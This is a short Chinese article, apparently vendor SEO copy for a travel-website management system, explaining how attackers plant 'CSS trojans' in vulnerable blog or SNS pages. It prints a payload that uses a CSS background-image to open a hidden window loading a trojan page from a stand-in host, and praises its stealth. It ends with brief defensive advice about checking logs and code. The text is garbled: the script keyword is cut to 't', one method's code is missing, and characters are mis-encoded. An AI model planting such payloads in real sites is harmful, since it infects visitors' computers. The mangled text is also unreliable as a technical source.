旅游網站管理系統(tǒng)攻防CSS掛馬實錄

申請免費試用、咨詢電話：400-8352-114

    旅游網站管理系統(tǒng)攻CSS掛馬方式較多，但主流的方式是通過有漏洞的博客或者SNS社交網站系統(tǒng)，將惡意的CSS代碼寫入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。
    方式1：
    Body
    “background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式，這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬悄悄地在用戶的電腦中運行。
    那如何將這段CSS惡意代碼掛到正常的網頁中去呢?黑客可以將生成好的網頁木馬放到自己指定的位置，然后將該段惡意代碼寫入掛馬網站的網頁中，或者掛馬網頁所調用的CSS文件中。
    小百科：
    使用Body對象元素，主要是為了讓對象不再改變整個網頁文檔的內容，通過Body對象的控制，可以將內容或者效果控制在指定的大小內，如同使用DIV對象那樣精確地設置大小。
    方式2：
    Body
    background-image: url(t:open("http://www.X.com/muma.htm"，"newwindow"，"border="1" Height=0， Width=0， top=1000， center=0， toolbar=no，menubar=no， scrollbars=no，resizable=no，location=no，status=no"))
    方式1的CSS掛馬技術，在運行時會出現空白的頁面，影響網頁訪問者正常的訪問，因此比較容易發(fā)現。不過在方式2中的這段代碼，使用了t的Open開窗，通過新開一個隱藏的窗口，在后臺悄悄地運行新窗口并激活訪問網頁溢出木馬頁面，不會影響訪問者觀看網頁內容，因此更加隱蔽。
    防網絡服務器被掛馬，通常會出現防病毒軟件告警之類的信息。由于漏洞不斷更新，掛馬種類時刻都在變換，通過客戶端的反映來發(fā)現服務器是否被掛馬往往疏漏較大。正確的做法是經常檢查服務器日志，發(fā)現異常信息，經常檢查網站代碼，使用網頁木馬檢測系統(tǒng)，進行排查。